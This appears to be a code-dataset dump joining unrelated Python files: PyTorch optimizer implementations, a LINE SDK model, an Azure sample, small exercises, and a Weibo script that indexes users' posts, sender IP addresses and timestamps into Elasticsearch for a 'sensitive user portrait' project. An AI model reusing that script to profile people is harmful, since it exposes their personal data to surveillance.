state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
# Bias corrections
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
# Compute length of SMA
sma_t = sma_inf - 2 * state['step'] * (1 - bias_correction2) / bias_correction2
# Weight decay
if group['weight_decay'] != 0:
p.data.add_(-group['lr'] * group['weight_decay'], p.data)
if sma_t > 4:
# Variance rectification term
r_t = math.sqrt((sma_t - 4) * (sma_t - 2) * sma_inf / ((sma_inf - 4) * (sma_inf - 2) * sma_t))
# Adaptive momentum
p.data.addcdiv_(-group['lr'] * r_t, exp_avg / bias_correction1, (exp_avg_sq / bias_correction2).sqrt().add_(group['eps']))
else:
# Unadapted momentum
p.data.add_(-group['lr'], exp_avg / bias_correction1)
return loss
class Ralamb(Optimizer):
'''
RAdam + LARS
Example:
>>> model = ResNet()
>>> optimizer = Ralamb(model.parameters(), lr=0.001)
'''
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
self.buffer = [[None, None, None] for ind in range(10)]
super(Ralamb, self).__init__(params, defaults)
def __setstate__(self, state):
super(Ralamb, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Ralamb does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
# Decay the first and second moment running average coefficient
# m_t
exp_avg.mul_(beta1).add_(1 - beta1, grad)
# v_t
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
state['step'] += 1
buffered = self.buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, radam_step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
# more conservative since it's an approximated value
if N_sma >= 5:
radam_step_size = math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
radam_step_size = 1.0 / (1 - beta1 ** state['step'])
buffered[2] = radam_step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
# more conservative since it's an approximated value
radam_step = p_data_fp32.clone()
if N_sma >= 5:
denom = exp_avg_sq.sqrt().add_(group['eps'])
radam_step.addcdiv_(-radam_step_size * group['lr'], exp_avg, denom)
else:
radam_step.add_(-radam_step_size * group['lr'], exp_avg)
radam_norm = radam_step.pow(2).sum().sqrt()
weight_norm = p.data.pow(2).sum().sqrt().clamp(0, 10)
if weight_norm == 0 or radam_norm == 0:
trust_ratio = 1
else:
trust_ratio = weight_norm / radam_norm
state['weight_norm'] = weight_norm
state['adam_norm'] = radam_norm
state['trust_ratio'] = trust_ratio
if N_sma >= 5:
p_data_fp32.addcdiv_(-radam_step_size * group['lr'] * trust_ratio, exp_avg, denom)
else:
p_data_fp32.add_(-radam_step_size * group['lr'] * trust_ratio, exp_avg)
p.data.copy_(p_data_fp32)
return loss
class Lookahead(Optimizer):
'''
a PyTorch implementation of the Lookahead Optimizer from th paper
Lookahead Optimizer: k steps forward, 1 step back.
https://arxiv.org/abs/1907.08610
Example:
>>> import torch.optim as optim
>>> base_optimizer = optim.Adam(model.parameters(), lr=0.001)
>>> optimizer = Lookahead(base_optimizer=base_optimizer,k=5,alpha=0.5)
'''
def __init__(self, base_optimizer,alpha=0.5, k=6):
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
self.optimizer = base_optimizer
self.param_groups = self.optimizer.param_groups
self.alpha = alpha
self.k = k
for group in self.param_groups:
group["step_counter"] = 0
self.slow_weights = [[p.clone().detach() for p in group['params']]
for group in self.param_groups]
for w in it.chain(*self.slow_weights):
w.requires_grad = False
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
loss = self.optimizer.step()
for group,slow_weights in zip(self.param_groups,self.slow_weights):
group['step_counter'] += 1
if group['step_counter'] % self.k != 0:
continue
for p,q in zip(group['params'],slow_weights):
if p.grad is None:
continue
q.data.add_(self.alpha,p.data - q.data)
p.data.copy_(q.data)
return loss
class RaLars(Optimizer):
"""Implements the RAdam optimizer from https://arxiv.org/pdf/1908.03265.pdf
with optional Layer-wise adaptive Scaling from https://arxiv.org/pdf/1708.03888.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining parameter groups
lr (float, optional): learning rate
betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
scale_clip (float, optional): the maximal upper bound for the scale factor of LARS
Example:
>>> model = ResNet()
>>> optimizer = RaLars(model.parameters(), lr=0.001)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0,
scale_clip=None):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super(RaLars, self).__init__(params, defaults)
# LARS arguments
self.scale_clip = scale_clip
if self.scale_clip is None:
self.scale_clip = (0, 10)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
# Get group-shared variables
beta1, beta2 = group['betas']
sma_inf = group.get('sma_inf')
# Compute max length of SMA on first step
if not isinstance(sma_inf, float):
group['sma_inf'] = 2 / (1 - beta2) - 1
sma_inf = group.get('sma_inf')
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
# Bias correction
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
# Compute length of SMA
sma_t = sma_inf - 2 * state['step'] * (1 - bias_correction2) / bias_correction2
update = torch.zeros_like(p.data)
if sma_t > 4:
# Variance rectification term
r_t = math.sqrt((sma_t - 4) * (sma_t - 2) * sma_inf / ((sma_inf - 4) * (sma_inf - 2) * sma_t))
# Adaptive momentum
update.addcdiv_(r_t, exp_avg / bias_correction1, (exp_avg_sq / bias_correction2).sqrt().add_(group['eps']))
else:
# Unadapted momentum
update.add_(exp_avg / bias_correction1)
# Weight decay
if group['weight_decay'] != 0:
update.add_(group['weight_decay'], p.data)
# LARS
p_norm = p.data.pow(2).sum().sqrt()
update_norm = update.pow(2).sum().sqrt()
phi_p = p_norm.clamp(*self.scale_clip)
# Compute the local LR
if phi_p == 0 or update_norm == 0:
local_lr = 1
else:
local_lr = phi_p / update_norm
state['local_lr'] = local_lr
p.data.add_(-group['lr'] * local_lr, update)
return loss
class Ranger(Optimizer):
'''
Ranger - a synergistic optimizer combining RAdam (Rectified Adam) and LookAhead in one codebase.
full refactoring for slow weights and one pass handling (vs two before).
Refactor should eliminate any random save/load issues regarding memory.
1 - Ranger is the optimizer we used to beat the high scores for 12 different categories on the FastAI leaderboards!
(Previous records all held with AdamW optimizer).
2 - Highly recommend combining Ranger with: Mish activation function, and flat+ cosine anneal training curve.
3 - Based on that, also found .95 is better than .90 for beta1 (momentum) param (ala betas=(0.95, 0.999)).
Example:
>>> model = ResNet()
>>> optimizer = Ranger(model.parameters(), lr=0.001)
'''
def __init__(self, params, lr=1e-3, alpha=0.5, k=6, N_sma_threshhold=5, betas=(.95,0.999), eps=1e-5, weight_decay=0):
#parameter checks
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
if not lr > 0:
raise ValueError(f'Invalid Learning Rate: {lr}')
if not eps > 0:
raise ValueError(f'Invalid eps: {eps}')
#parameter comments:
# beta1 (momentum) of .95 seems to work better than .90...
#N_sma_threshold of 5 seems better in testing than 4.
#In both cases, worth testing on your dataset (.90 vs .95, 4 vs 5) to make sure which works best for you.
#prep defaults and init torch.optim base
defaults = dict(lr=lr, alpha=alpha, k=k, step_counter=0, betas=betas, N_sma_threshhold=N_sma_threshhold, eps=eps, weight_decay=weight_decay)
super().__init__(params,defaults)
#adjustable threshold
self.N_sma_threshhold = N_sma_threshhold
#now we can get to work...
#removed as we now use step from RAdam...no need for duplicate step counting
#for group in self.param_groups:
# group["step_counter"] = 0
#print("group step counter init")
#look ahead params
self.alpha = alpha
self.k = k
#radam buffer for state
self.radam_buffer = [[None,None,None] for ind in range(10)]
#self.first_run_check=0
#lookahead weights
#9/2/19 - lookahead param tensors have been moved to state storage.
#This should resolve issues with load/save where weights were left in GPU memory from first load, slowing down future runs.
#self.slow_weights = [[p.clone().detach() for p in group['params']]
# for group in self.param_groups]
#don't use grad for lookahead weights
#for w in it.chain(*self.slow_weights):
# w.requires_grad = False
def __setstate__(self, state):
print("set state called")
super(Ranger, self).__setstate__(state)
def step(self, closure=None):
loss = None
#note - below is commented out b/c I have other work that passes back the loss as a float, and thus not a callable closure.
#Uncomment if you need to use the actual closure...
#if closure is not None:
#loss = closure()
#Evaluate averages and grad, update param tensors
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Ranger optimizer does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p] #get state dict for this param
if len(state) == 0: #if first time to run...init dictionary with our desired entries
#if self.first_run_check==0:
#self.first_run_check=1
#print("Initializing slow buffer...should not see this at load from saved model!")
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
#look ahead weight storage now in state dict
state['slow_buffer'] = torch.empty_like(p.data)
state['slow_buffer'].copy_(p.data)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
#begin computations
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
#compute variance mov avg
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
#compute mean moving avg
exp_avg.mul_(beta1).add_(1 - beta1, grad)
state['step'] += 1
buffered = self.radam_buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
if N_sma > self.N_sma_threshhold:
step_size = math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
step_size = 1.0 / (1 - beta1 ** state['step'])
buffered[2] = step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
if N_sma > self.N_sma_threshhold:
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-step_size * group['lr'], exp_avg, denom)
else:
p_data_fp32.add_(-step_size * group['lr'], exp_avg)
p.data.copy_(p_data_fp32)
#integrated look ahead...
#we do it at the param level instead of group level
if state['step'] % group['k'] == 0:
slow_p = state['slow_buffer'] #get access to slow param tensor
slow_p.add_(self.alpha, p.data - slow_p) #(fast weights - slow weights) * alpha
p.data.copy_(slow_p) #copy interpolated weights to RAdam param tensor
return loss
class BertAdam(Optimizer):
"""Implements BERT version of Adam algorithm with weight decay fix.
Params:
lr: learning rate
warmup: portion of t_total for the warmup, -1 means no warmup. Default: -1
t_total: total number of training steps for the learning
rate schedule, -1 means constant learning rate. Default: -1
schedule: schedule to use for the warmup (see above). Default: 'warmup_linear'
b1: Adams b1. Default: 0.9
b2: Adams b2. Default: 0.999
e: Adams epsilon. Default: 1e-6
weight_decay: Weight decay. Default: 0.01
max_grad_norm: Maximum norm for the gradients (-1 means no clipping). Default: 1.0
"""
def __init__(self, params, lr, warmup=-1, t_total=-1, schedule='warmup_linear',
b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01,
max_grad_norm=1.0):
if lr < 0.0:
raise ValueError("Invalid learning rate: {} - should be >= 0.0".format(lr))
if schedule not in SCHEDULES:
raise ValueError("Invalid schedule parameter: {}".format(schedule))
if not 0.0 <= warmup < 1.0 and not warmup == -1:
raise ValueError("Invalid warmup: {} - should be in [0.0, 1.0[ or -1".format(warmup))
if not 0.0 <= b1 < 1.0:
raise ValueError("Invalid b1 parameter: {} - should be in [0.0, 1.0[".format(b1))
if not 0.0 <= b2 < 1.0:
raise ValueError("Invalid b2 parameter: {} - should be in [0.0, 1.0[".format(b2))
if not e >= 0.0:
raise ValueError("Invalid epsilon value: {} - should be >= 0.0".format(e))
defaults = dict(lr=lr, schedule=schedule, warmup=warmup, t_total=t_total,
b1=b1, b2=b2, e=e, weight_decay=weight_decay,
max_grad_norm=max_grad_norm)
super(BertAdam, self).__init__(params, defaults)
def get_lr(self):
lr = []
for group in self.param_groups:
for p in group['params']:
state = self.state[p]
if len(state) == 0:
return [0]
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
lr.append(lr_scheduled)
return lr
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['next_m'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['next_v'] = torch.zeros_like(p.data)
next_m, next_v = state['next_m'], state['next_v']
beta1, beta2 = group['b1'], group['b2']
# Add grad clipping
if group['max_grad_norm'] > 0:
clip_grad_norm_(p, group['max_grad_norm'])
# Decay the first and second moment running average coefficient
# In-place operations to update the averages at the same time
next_m.mul_(beta1).add_(1 - beta1, grad)
next_v.mul_(beta2).addcmul_(1 - beta2, grad, grad)
update = next_m / (next_v.sqrt() + group['e'])
# Just adding the square of the weights to the loss function is *not*
# the correct way of using L2 regularization/weight decay with Adam,
# since that will interact with the m and v parameters in strange ways.
#
# Instead we want to decay the weights in a manner that doesn't interact
# with the m/v parameters. This is equivalent to adding the square
# of the weights to the loss with plain (non-momentum) SGD.
if group['weight_decay'] > 0.0:
update += group['weight_decay'] * p.data
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
update_with_lr = lr_scheduled * update
p.data.add_(-update_with_lr)
state['step'] += 1
return loss | [
"[email protected]"
] | |
81ade5278aeab0a1197c12c2bde8a62122fad070 | 3f60b999ea7bda83c9586f75f52463dc20337f24 | /sensitive_user_portrait/cron/attribute/filter_sensitive_uid_text.py | d49971916dc61266df2f85bbccec815232885978 | [] | no_license | jianjian0dandan/sensitive_user_portrait | 629e49ce71db92b50634bac9c828811cdb5381e9 | cacc30267ebc0e621b1d48d4f1206277a0f48123 | refs/heads/master | 2021-01-20T23:18:07.138057 | 2016-05-22T12:09:40 | 2016-05-22T12:09:40 | 42,869,287 | 0 | 0 | null | 2015-09-21T13:55:12 | 2015-09-21T13:55:11 | null | UTF-8 | Python | false | false | 4,249 | py | # -*- coding: utf-8 -*-
import csv
import os
import sys
import time
from elasticsearch import Elasticsearch
from DFA_filter import sensitive_words_extract
reload(sys)
sys.path.append('./../flow1/')
from csv2json import itemLine2Dict, csv2bin
sys.setdefaultencoding('utf-8')
f_file = open('es_error.txt', 'wb')
CSV_FILE_PATH = '/home/ubuntu8/data1309/20130901'
uid_csv_path = './../recommend_in/'
uid_csv = 'sensitive_uid_list.txt'
es = Elasticsearch('219.224.135.93:9206')
count_n = 0
tb = time.time()
uid_set = set()
with open (os.path.join(uid_csv_path, uid_csv), 'rb') as t:
for line in t:
uid = line.strip()
uid_set.add(uid)
count_n += 1
uid_text = file('sensitive_uid_text_1.csv', 'wb')
writer = csv.writer(uid_text)
count = 0
count_f = 0
bulk_action = []
file_list = set(os.listdir(CSV_FILE_PATH))
print "total file is ", len(file_list)
for each in file_list:
with open(os.path.join(CSV_FILE_PATH, each), 'rb') as f:
try:
for line in f:
count_f += 1
weibo_item = itemLine2Dict(line)
if weibo_item:
weibo_item_bin = csv2bin(weibo_item)
if int(weibo_item_bin['sp_type']) != 1:
continue
#if not str(weibo_item_bin['uid']) in uid_set:
# continue
text = weibo_item_bin['text']
message_type = 0
if weibo_item_bin['message_type'] == 1:
write_text = text
message_type = 1
elif weibo_item_bin['message_type'] == 2:
temp = text.split('//@')[0].split(':')[1:]
write_text = ''.join(temp)
message_type = 2
elif weibo_item_bin['message_type'] == 3:
write_text = text
message_type = 3
else:
continue
if not isinstance(write_text, str):
text = text.encode('utf-8', 'ignore')
'''
if text:
sw_dict = sensitive_words_extract(text)
if not sw_dict:
sensitive = 0
else:
seneitive = 1
'''
origin_text = weibo_item_bin['text'].encode('utf-8', 'ignore')
item = [str(weibo_item_bin['uid']), str(weibo_item_bin['mid']), str(weibo_item_bin['send_ip']), str(weibo_item_bin['timestamp']), message_type, str(weibo_item_bin['root_uid']), str(weibo_item_bin['root_mid']), origin_text ]
key_list = ['uid', 'mid', 'ip', 'timestamp', 'message_type','root_uid', 'root_mid', 'text']
item_dict = dict()
for i in range(len(key_list)):
item_dict[key_list[i]] = item[i]
_id = item[1]
action = {'index': {'_id': _id}}
bulk_action.extend([action, item_dict])
count += 1
if count % 1000 == 0:
if bulk_action:
es.bulk(bulk_action, index='weibo_text', doc_type='text', timeout=30)
bulk_action = []
'''
except Exception, r:
time_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
f_file.write(time_date + '\t' + r + '\n')
'''
print count, count_f
#if write_text != "":
# writer.writerow(item)
# count += 1
if count_f % 10000 == 0:
ts = time.time()
print "%s per %s second" %(count_f, ts-tb)
print "have get %s" % count
tb = ts
except SystemError:
print "system error"
except Exception, r:
print Exception, r
print bulk_action
| [
"[email protected]"
] | |
ef9249722a55ff00c9ec100a856e360d1281320d | 5e255ad1360c90478393744586663741a9569c21 | /linebot/v3/audience/models/create_audience_group_request.py | 3d855e668830bb2b753b6d12e2288f9444ee979f | [
"Apache-2.0"
] | permissive | line/line-bot-sdk-python | d76268e8b542060d6eccbacc5dbfab16960ecc35 | cffd35948238ae24982173e30b1ea1e595bbefd9 | refs/heads/master | 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 | Apache-2.0 | 2023-09-11T05:14:07 | 2016-10-11T03:42:26 | Python | UTF-8 | Python | false | false | 3,502 | py | # coding: utf-8
"""
LINE Messaging API
This document describes LINE Messaging API. # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import List, Optional
from pydantic.v1 import BaseModel, Field, StrictBool, StrictStr, conlist, constr
from linebot.v3.audience.models.audience import Audience
class CreateAudienceGroupRequest(BaseModel):
"""
Create audience for uploading user IDs (by JSON)
https://developers.line.biz/en/reference/messaging-api/#create-upload-audience-group
"""
description: Optional[constr(strict=True, max_length=120)] = Field(None, description="The audience's name. This is case-insensitive, meaning AUDIENCE and audience are considered identical. Max character limit: 120 ")
is_ifa_audience: Optional[StrictBool] = Field(None, alias="isIfaAudience", description="To specify recipients by IFAs: set true. To specify recipients by user IDs: set false or omit isIfaAudience property. ")
upload_description: Optional[StrictStr] = Field(None, alias="uploadDescription", description="The description to register for the job (in jobs[].description). ")
audiences: Optional[conlist(Audience, max_items=10000)] = Field(None, description="An array of user IDs or IFAs. Max number: 10,000 ")
__properties = ["description", "isIfaAudience", "uploadDescription", "audiences"]
class Config:
"""Pydantic configuration"""
allow_population_by_field_name = True
validate_assignment = True
def to_str(self) -> str:
"""Returns the string representation of the model using alias"""
return pprint.pformat(self.dict(by_alias=True))
def to_json(self) -> str:
"""Returns the JSON representation of the model using alias"""
return json.dumps(self.to_dict())
@classmethod
def from_json(cls, json_str: str) -> CreateAudienceGroupRequest:
"""Create an instance of CreateAudienceGroupRequest from a JSON string"""
return cls.from_dict(json.loads(json_str))
def to_dict(self):
"""Returns the dictionary representation of the model using alias"""
_dict = self.dict(by_alias=True,
exclude={
},
exclude_none=True)
# override the default output from pydantic.v1 by calling `to_dict()` of each item in audiences (list)
_items = []
if self.audiences:
for _item in self.audiences:
if _item:
_items.append(_item.to_dict())
_dict['audiences'] = _items
return _dict
@classmethod
def from_dict(cls, obj: dict) -> CreateAudienceGroupRequest:
"""Create an instance of CreateAudienceGroupRequest from a dict"""
if obj is None:
return None
if not isinstance(obj, dict):
return CreateAudienceGroupRequest.parse_obj(obj)
_obj = CreateAudienceGroupRequest.parse_obj({
"description": obj.get("description"),
"is_ifa_audience": obj.get("isIfaAudience"),
"upload_description": obj.get("uploadDescription"),
"audiences": [Audience.from_dict(_item) for _item in obj.get("audiences")] if obj.get("audiences") is not None else None
})
return _obj
| [
"[email protected]"
] | |
f8e54ed7de4fa1713441907b2b002188d27537c3 | d7da288db4fd9fc0bb1c60c5074f290b5f70c8ef | /Aulas Python/Conteúdo das Aulas/033/Gabarito/Exercício 1 - Gabarito.py | 897f4b881fb6433e5d3d0ea8f4c4d834a4d639ac | [] | no_license | luizdefranca/Curso-Python-IgnoranciaZero | dbf4cf342b3f3efea6fb3b8cf27bf39ed92927e9 | 9fbf2f25e3e6fce1f1582af0bd6bc7dbc5b9f588 | refs/heads/master | 2020-04-09T07:17:00.735378 | 2016-09-12T10:51:37 | 2016-09-12T10:51:37 | 67,999,169 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | """
Faça um programa com uma função chamada somaImposto.
A função possui dois parâmetros formais:
1 - taxaImposto, que é a quantia de imposto sobre vendas expressa em
porcentagem
2 - custo, que é o custo de um item antes do imposto.
A função “altera” o valor de custo para incluir o imposto sobre vendas.
"""
def somaImposto(taxaImposto, custo):
return custo*(1 + taxaImposto/100)
custo_normal = float(input("Digite o custo(R$): "))
taxa = float(input("Digite a taxa de imposto(%): "))
print("O custo recalculado com o imposto é de R$%.2f"%somaImposto(custo_normal, taxa))
| [
"[email protected]"
] | |
9679197a61ccf26610d250d3868a81a8e7401233 | 3e9cdcc8847da5a2ea8391639ad8fd95592475b1 | /696.py | edda7ebd43c2b347e2386e5ca317ea69007a5d58 | [] | no_license | mindentropy/leetcode | ec790ed671a2224411133af127e605438bbbbe52 | 4a24edca5926c0b10d1a4786262dd403b12d1aee | refs/heads/master | 2023-01-27T11:26:07.949478 | 2023-01-25T19:08:18 | 2023-01-25T19:08:18 | 233,759,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | #!/usr/bin/env python
class Solution(object):
def countBinarySubstrings(self, s):
strcnt = 0
i = 0
while i < len(s) - 1:
j = i + 1
oppcnt = 1
eqflag = True
while j < len(s):
if s[i] == s[j]:
if eqflag == False:
break
oppcnt += 1
else:
oppcnt -= 1
eqflag = False
j += 1
if oppcnt <= 0:
break
if oppcnt == 0:
strcnt += 1
i += 1
return strcnt
class Solution(object):
def countBinarySubstrings(self, s):
group = [1]
for idx in xrange(1, len(s)):
if s[idx - 1] != s[idx]:
group.append(1)
else:
group[-1] += 1
cnt = 0
for idx in xrange(len(group) - 1):
cnt += min(group[idx], group[idx + 1])
return cnt
if __name__ == '__main__':
sol = Solution()
print sol.countBinarySubstrings('00110011')
| [
"[email protected]"
] | |
8bf5c9cb87033d334d26c9436c9f04e4b173ba65 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/kusto/azure-mgmt-kusto/generated_samples/kusto_managed_private_endpoints_check_name_availability.py | 3ccfc9a68d42bd47f54b8ba0ce14082f3885382b | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,746 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.kusto import KustoManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-kusto
# USAGE
python kusto_managed_private_endpoints_check_name_availability.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = KustoManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-1234-123456789098",
)
response = client.managed_private_endpoints.check_name_availability(
resource_group_name="kustorptest",
cluster_name="kustoCluster",
resource_name={"name": "pme1", "type": "Microsoft.Kusto/clusters/managedPrivateEndpoints"},
)
print(response)
# x-ms-original-file: specification/azure-kusto/resource-manager/Microsoft.Kusto/stable/2023-05-02/examples/KustoManagedPrivateEndpointsCheckNameAvailability.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
f9149adc1d138f483eb14838fe57cbf12e65eec4 | 5de5ae0adb6fb1e73c2e897fbc13b6abf53c559b | /Applications/Equations/knapsack-1.py | 98dc10ab696f6baaedba79c8b32dbe93669eedb8 | [] | no_license | Trietptm-on-Coding-Algorithms/Learning-Z3 | af935450226ee3299e10361f21a567945aa0fd5c | c5ef7faca49aa164556b3c7e9ccfb4709027cf74 | refs/heads/master | 2020-05-13T18:34:38.105308 | 2017-12-23T11:08:43 | 2017-12-23T11:08:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | # Solving knapsack problem with Z3
#
# Use:
# python knapsack.py
#
from z3 import *
# from https://www.xkcd.com/287/
fruits, fries, salad, wings, sticks, plate = Ints('fruits fries salad wings sticks plate')
s = Solver()
s.add(fruits>=0, fries>=0, salad>=0, wings>=0, sticks>=0, plate>=0)
s.add(215*fruits + 275*fries + 225*salad + 355*wings + 420*sticks + 580*plate == 1505)
result = []
while s.check() == sat:
m = s.model()
print(m)
result.append(m)
# Create new constraint the blocks the current model
block = []
for el in m:
# el is a declaration
if el.arity() > 0:
raise Z3Exception("uninterpreted function are not supported")
# Create a constant from declaration
obj = el()
if is_array(obj) or obj.sort().kind() == Z3_UNINTERPRETED_SORT:
raise Z3Exception("arrays and uninterpreted sorts are not supported")
block.append(obj != m[el])
s.add(Or(block))
print(len(result))
# https://stackoverflow.com/questions/141779/solving-the-np-complete-proble | [
"[email protected]"
] | |
